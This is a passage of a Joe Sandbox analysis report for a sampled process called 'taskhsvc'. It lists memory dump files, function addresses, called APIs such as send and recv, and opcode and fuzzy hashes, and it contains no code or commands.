Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failfree$abortstrcmp
String ID:
API String ID: 353306561-0
Opcode ID: 022d9a86bcfbe1c2218f6b80d0e54ba7cfdf79164be55e32bc9a3a8c45999fc1
Instruction ID: 8af7524756d8e7c70f404a271292f54feecfe654fbe3c6bfc11ba490c168d2ad
Opcode Fuzzy Hash: 022d9a86bcfbe1c2218f6b80d0e54ba7cfdf79164be55e32bc9a3a8c45999fc1
Instruction Fuzzy Hash: 5CE1BBB4A04219CFCB50DFA9D584AEDBBF0BF48304F24845AE896AB351D338E945DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4243 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB331A: __stack_chk_fail.LIBSSP-0 ref: 00DB335F

recv.WS2_32 ref: 00DB42C1
__stack_chk_fail.LIBSSP-0 ref: 00DB4444

Strings

G', xrefs: 00DB42EC

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$recv
String ID: G'
API String ID: 3003304323-1542159958
Opcode ID: 24bf14d769e38f50830b222c3037f0d0d13f0cbfa5606f4aea08f1100da356d9
Instruction ID: 00e6709cfd1b3981576d1180cab714fa702dade5bcf993492dc326808d6372ed
Opcode Fuzzy Hash: 24bf14d769e38f50830b222c3037f0d0d13f0cbfa5606f4aea08f1100da356d9
Instruction Fuzzy Hash: 065182B4904249DFCB00DFA9C584A9EBBF0FF48714F148829E499AB352D7789944DF62

Uniqueness

Uniqueness Score: -1.00%

Function 00DC0A12 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DC0A3E

Part of subcall function 00DB3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00D91825), ref: 00DB3E14

Part of subcall function 00DC0D83: __stack_chk_fail.LIBSSP-0 ref: 00DC1529

__stack_chk_fail.LIBSSP-0 ref: 00DC0D39

Part of subcall function 00EE919B: strerror.MSVCRT ref: 00EE91ED
Part of subcall function 00EE919B: __stack_chk_fail.LIBSSP-0 ref: 00EE91FD

Strings

(unknown, errno was 0), xrefs: 00DC0A99
;, xrefs: 00DC0B68

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$strrchr$abortstrerror
String ID: (unknown, errno was 0)$;
API String ID: 3660670763-788531020
Opcode ID: b0e4e81437d5a6525fa3c66bd689889019de7b7dd5f1c1ce169becef6c9b63ef
Instruction ID: 2977141472dd20fffe26569bbe37c6474a661ba4200ee0be88ee7d8a16f77b3e
Opcode Fuzzy Hash: b0e4e81437d5a6525fa3c66bd689889019de7b7dd5f1c1ce169becef6c9b63ef
Instruction Fuzzy Hash: 1241A974A04745CFCB00EFB9C485AADBBF0AF08350F45885AE899EB256D634D941DF72

Uniqueness

Uniqueness Score: -1.00%

Function 00EF65E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00EF5CFA: abort.MSVCRT ref: 00EF5D72
Part of subcall function 00EF5CFA: abort.MSVCRT ref: 00EF5DB1
Part of subcall function 00EF5CFA: abort.MSVCRT ref: 00EF5DF6

__stack_chk_fail.LIBSSP-0 ref: 00EF6762

Strings

m, xrefs: 00EF6720

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail
String ID: m
API String ID: 2908038143-1902112267
Opcode ID: 18951bdc726fd6b287a998c6e551a3e2665dcbb54746cba441611a4ba7baaa10
Instruction ID: 23fcb3036c49a2323e8515ba6add7b8b34993ddc88e00d7df240f45c3129639e
Opcode Fuzzy Hash: 18951bdc726fd6b287a998c6e551a3e2665dcbb54746cba441611a4ba7baaa10
Instruction Fuzzy Hash: B541A2B4A046099FCB00EFA8C585AAEBBF0BF48314F108959E598E7390D734A944DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00DB488E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00DB48F4
__stack_chk_fail.LIBSSP-0 ref: 00DB4A08

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00DB3B5E: abort.MSVCRT ref: 00DB3BBD
Part of subcall function 00DB3B5E: abort.MSVCRT ref: 00DB3C00
Part of subcall function 00DB3B5E: __stack_chk_fail.LIBSSP-0 ref: 00DB3CB8

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00DB49F5

Strings

G', xrefs: 00DB4923

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
